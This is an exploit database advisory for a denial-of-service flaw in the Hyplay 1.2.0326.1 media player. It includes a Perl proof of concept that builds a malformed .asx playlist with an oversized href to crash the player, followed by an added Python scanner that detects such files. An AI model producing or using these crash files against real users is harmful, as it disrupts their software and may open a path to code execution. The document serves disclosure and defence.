Hyplay 1.2.0326.1 - .asx Remote Denial of Service Vulnerability
2010-05-10T00:00:00
ID: EDB-ID:33973
Type: exploitdb
Reporter: Steve James
Modified: 2010-05-10T00:00:00
Description
Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability. DoS exploit for the Windows platform.
source: http://www.securityfocus.com/bid/40048/info
Hyplay is prone to a remote denial-of-service vulnerability.
Attackers may leverage this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
Hyplay 1.2.0326.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC
#Download: http://www.hyplay.com/download.asp
#Written/Discovered by: xsploited Security
#Tested on Windows XP SP2
#URL: http://x-sploited.com/
#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca
#A bug exists in the way Hyplay processes malformed .asx play
#list files. This could potentially lead to code execution on
#the user's machine.
use strict;
use warnings;

# ASX header up to the opening quote of the href value. The bytes decode to:
#   <asx version = "3.0" >  <entry>  <ref href = "
my $data1=
"\x3C\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20".
"\x22\x33\x2E\x30\x22\x20\x3E\x0D\x0D\x0A\x3C\x65\x6E\x74\x72".
"\x79\x3E\x0D\x0D\x0A".
"\x3C\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3D\x20\x22";
my $data2="http://"; # scheme prefix of the href value
# The footer bytes decode to:  " />  </entry>  </asx>
my $data3= #asx file footer
"\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x65\x6E\x74\x72\x79\x3E\x0D".
"\x0A\x3C\x2F\x61\x73\x78\x3E";
my $junk = "\x41" x 3000; # 3000 "A" bytes appended to the href value
# Three-argument open with an error check, so a failed write is reported
open(my $playlist, ">", "hyplay_d0s.asx") or die "Cannot open hyplay_d0s.asx: $!";
print $playlist $data1.$data2.$junk.$data3."\r\n";
close $playlist;
print "\nEvil asx file created successfully.";
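
A defensive check for the file shape this PoC produces, as an added example that is not part of the original advisory or PoC: it scans .asx playlist bytes for href values that are oversized or never closed. The 1024-byte limit, the function names and the sample playlists are assumptions constructed for illustration.

```python
import re

# Assumed policy limit for one playlist URL; not a value from the advisory.
MAX_HREF_LEN = 1024

# Start of an href attribute value: tolerant of spaces around "=" and of
# either quote character, matched case-insensitively.
HREF_OPEN = re.compile(rb"""href\s*=\s*(["'])""", re.IGNORECASE)

# Constructed samples: a normal playlist, one with the oversized href shape
# described above, and one whose href value is never closed.
BENIGN = b'<asx version = "3.0" >\r\n<entry>\r\n<ref href = "http://example.invalid/a.wma" />\r\n</entry>\r\n</asx>'
OVERSIZED = b'<asx version = "3.0" >\r\n<entry>\r\n<ref href = "http://' + b"A" * 3000 + b'" />\r\n</entry>\r\n</asx>'
UNTERMINATED = b'<asx version = "3.0" >\r\n<entry>\r\n<ref href = "http://example.invalid/a.wma'


def longest_run(value: bytes) -> int:
    """Length of the longest run of a single repeated byte (filler indicator)."""
    best = run = 0
    prev = None
    for b in value:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def scan_asx(data: bytes, limit: int = MAX_HREF_LEN) -> list:
    """Report href values that exceed `limit` bytes or lack a closing quote."""
    findings = []
    for m in HREF_OPEN.finditer(data):
        start = m.end()
        end = data.find(m.group(1), start)
        terminated = end != -1
        if not terminated:
            end = len(data)  # value runs to end of file
        value = data[start:end]
        if len(value) > limit or not terminated:
            findings.append({"offset": start, "length": len(value),
                             "terminated": terminated,
                             "longest_run": longest_run(value)})
    return findings


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED),
                         ("unterminated", UNTERMINATED)):
        print(name, scan_asx(sample))
```

A check like this fits a mail or web gateway that inspects playlist attachments before they reach a media player; the limit should be tuned to the longest URL the environment legitimately uses.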